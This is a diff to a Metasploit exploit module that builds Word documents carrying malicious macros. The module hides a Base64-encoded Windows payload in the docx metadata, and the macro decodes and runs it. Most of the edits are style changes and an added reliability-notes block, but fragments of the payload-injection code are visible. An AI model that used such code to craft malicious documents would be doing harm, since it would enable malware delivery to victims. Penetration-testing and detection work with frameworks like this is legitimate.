@@ -11,32 +11,30 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Microsoft Office Word Malicious Macro Execution",
-      'Description'    => %q{
-        This module injects a malicious macro into a Microsoft Office Word document (docx). The
-        comments field in the metadata is injected with a Base64 encoded payload, which will be
-        decoded by the macro and execute as a Windows executable.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Microsoft Office Word Malicious Macro Execution",
+        'Description' => %q{
+          This module injects a malicious macro into a Microsoft Office Word document (docx). The
+          comments field in the metadata is injected with a Base64 encoded payload, which will be
+          decoded by the macro and execute as a Windows executable.
 
-        For a successful attack, the victim is required to manually enable macro execution.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          For a successful attack, the victim is required to manually enable macro execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'sinn3r' # Metasploit
         ],
-      'References'     =>
-        [
+        'References' => [
           ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
           'DisablePayloadHandler' => true
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [
             'Microsoft Office Word on Windows',
             {
@@ -51,9 +49,15 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2012-01-10'
-    ))
+        'Privileged' => false,
+        'DisclosureDate' => '2012-01-10',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([
       OptPath.new("CUSTOMTEMPLATE", [true, 'A docx file that will be used as a template to build the exploit', File.join(macro_resource_directory, 'template.docx')]),
@@ -121,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     last_index = get_last_relationship_index_from_rels
-    relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
+    relationships_node.add_child("<Relationship Id=\"rId#{last_index + 1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
   end
 
   def add_doc_relationship(type, target)
@@ -133,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     last_index = get_last_relationship_index_from_doc_rels
-    relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
+    relationships_node.add_child("<Relationship Id=\"rId#{last_index + 1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
   end
 
   def get_last_relationship_index_from_rels
@@ -176,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote
     add_doc_relationship(scheme, fname)
 
     @docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
-    @docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
-    @docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
+    @docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels }
+    @docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin }
   end
 
   def get_vbadata_xml
@@ -203,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def inject_payload
-    p  = padding = ' ' * 55
+    p = padding = ' ' * 55
     p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
 
     begin
